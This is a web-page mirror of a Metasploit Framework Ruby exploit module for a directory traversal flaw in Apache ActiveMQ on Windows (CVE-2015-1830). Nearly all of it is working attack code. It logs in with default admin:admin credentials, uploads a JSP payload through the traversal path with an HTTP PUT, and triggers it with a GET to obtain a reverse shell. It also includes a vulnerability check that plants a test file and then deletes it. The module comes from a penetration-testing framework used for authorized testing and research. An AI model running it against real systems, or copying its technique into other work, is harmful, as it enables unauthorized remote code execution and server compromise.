CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/http/apache_activemq_traversal_upload.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Apache ActiveMQ 5.x-5.11.1 Directory Traversal Shell Upload',

16
        'Description' => %q{

17
          This module exploits a directory traversal vulnerability (CVE-2015-1830) in Apache

18
          ActiveMQ 5.x before 5.11.2 for Windows.

19


20
          The module tries to upload a JSP payload to the /admin directory via the traversal

21
          path /fileserver/..\admin\ using an HTTP PUT request with the default ActiveMQ

22
          credentials admin:admin (or other credentials provided by the user). It then issues

23
          an HTTP GET request to /admin/<payload>.jsp on the target in order to trigger the

24
          payload and obtain a shell.

25
        },

26
        'Author' => [

27
          'David Jorm', # Discovery and exploit

28
          'Erik Wynter' # @wyntererik - Metasploit

29
        ],

30
        'References' => [

31
          [ 'CVE', '2015-1830' ],

32
          [ 'EDB', '40857'],

33
          [ 'URL', 'https://activemq.apache.org/security-advisories.data/CVE-2015-1830-announcement.txt' ]

34
        ],

35
        'Privileged' => false,

36
        'Platform' => %w[win],

37
        'Targets' => [

38
          [

39
            'Windows Java',

40
            {

41
              'Arch' => ARCH_JAVA,

42
              'Platform' => 'win'

43
            }

44
          ],

45
        ],

46
        'DisclosureDate' => '2015-08-19',

47
        'License' => MSF_LICENSE,

48
        'DefaultOptions' => {

49
          'RPORT' => 8161,

50
          'PAYLOAD' => 'java/jsp_shell_reverse_tcp'

51
        },

52
        'DefaultTarget' => 0,

53
        'Notes' => {

54
          'Stability' => [ CRASH_SAFE ],

55
          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],

56
          'Reliability' => [ REPEATABLE_SESSION ]

57
        }

58
      )

59
    )

60


61
    register_options([

62
      OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),

63
      OptString.new('PATH', [true, 'Traversal path', '/fileserver/..\\admin\\']),

64
      OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),

65
      OptString.new('PASSWORD', [true, 'Password to authenticate with', 'admin'])

66
    ])

67
  end

68


69
  def check

70
    print_status('Running check...')

71
    testfile = Rex::Text.rand_text_alpha(10)

72
    testcontent = Rex::Text.rand_text_alpha(10)

73


74
    send_request_cgi({

75
      'uri' => normalize_uri(target_uri.path, datastore['PATH'], "#{testfile}.jsp"),

76
      'headers' => {

77
        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])

78
      },

79
      'method' => 'PUT',

80
      'data' => "<% out.println(\"#{testcontent}\");%>"

81
    })

82


83
    res1 = send_request_cgi({

84
      'uri' => normalize_uri(target_uri.path, "admin/#{testfile}.jsp"),

85
      'headers' => {

86
        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])

87
      },

88
      'method' => 'GET'

89
    })

90


91
    if res1 && res1.body.include?(testcontent)

92
      send_request_cgi(

93
        {

94
          'uri' => normalize_uri(target_uri.path, "admin/#{testfile}.jsp"),

95
          'headers' => {

96
            'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])

97
          },

98
          'method' => 'DELETE'

99
        },

100
        1

101
      )

102
      return Exploit::CheckCode::Vulnerable

103
    end

104


105
    Exploit::CheckCode::Safe

106
  end

107


108
  def exploit

109
    print_status('Uploading payload...')

110
    testfile = Rex::Text.rand_text_alpha(10)

111
    vprint_status("If upload succeeds, payload will be available at #{target_uri.path}admin/#{testfile}.jsp") # This information is provided to allow for manual execution of the payload in case the upload is successful but the GET request issued by the module fails.

112


113
    send_request_cgi({

114
      'uri' => normalize_uri(target_uri.path, datastore['PATH'], "#{testfile}.jsp"),

115
      'headers' => {

116
        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])

117
      },

118
      'method' => 'PUT',

119
      'data' => payload.encoded

120
    })

121


122
    print_status('Payload sent. Attempting to execute the payload.')

123
    res = send_request_cgi({

124
      'uri' => normalize_uri(target_uri.path, "admin/#{testfile}.jsp"),

125
      'headers' => {

126
        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])

127
      },

128
      'method' => 'GET'

129
    })

130
    if res && res.code == 200

131
      print_good('Payload executed!')

132
    else

133
      fail_with(Failure::PayloadFailed, 'Failed to execute the payload')

134
    end

135
  end

136
end

137


138